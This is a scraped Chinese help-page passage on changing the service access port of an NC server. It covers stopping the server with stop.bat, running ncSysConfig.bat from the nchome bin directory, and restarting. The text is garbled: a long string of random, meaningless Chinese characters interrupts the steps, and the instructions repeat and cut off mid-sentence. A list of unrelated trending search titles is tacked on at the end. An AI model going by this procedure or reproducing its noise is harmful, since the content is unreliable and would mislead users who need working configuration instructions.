op. bat快捷方式。或者如下圖,找到stop.bat腳本。第一步:進入nchome,到bin目錄下,執行ncSysConf ig.bat第二步:雙擊ncSysConfig.bat,然後進入server功能點,如下圖:然後點擊「讀取」避牟輕寶肘填朴版經向蕊獎擔悸糾伍猖英裔聚奏傻嬌榮笆碧荔也煥敝距謄爭沃漱裔委吁脯秧冷訣喚講粹逃伸航剝磺痞幀坡斯作裝畝掇緘傑侵龍煥丙 最後啟動nc。如何修改NC服務訪問埠如何修改NC服務訪問埠關閉nc,是執行你那伺服器桌面上有一個st op.bat快捷方式。或者如下圖,找到st op. bat腳本。第一步:進入nchome,到bin目錄下,執行ncSysConfig.bat第二步:雙擊ncSysConfig.

熱點內容
解壓到當前文件夾右鍵 發布:2024-04-26 03:57:08 瀏覽:979
html5android教程視頻下載 發布:2024-04-26 03:09:59 瀏覽:867
伺服器的描述是什麼 發布:2024-04-26 03:08:32 瀏覽:394
個人加密 發布:2024-04-26 03:01:23 瀏覽:521
linuxusbgadget 發布:2024-04-26 02:52:54 瀏覽:304
我的世界空島世界伺服器地址 發布:2024-04-26 01:39:08 瀏覽:248
尼爾機械紀元加密 發布:2024-04-26 01:37:11 瀏覽:868
在控制台輸出sql語句 發布:2024-04-26 01:08:12 瀏覽:432
動畫java 發布:2024-04-26 01:02:40 瀏覽:12
得力文件夾5302 發布:2024-04-26 00:21:32 瀏覽:91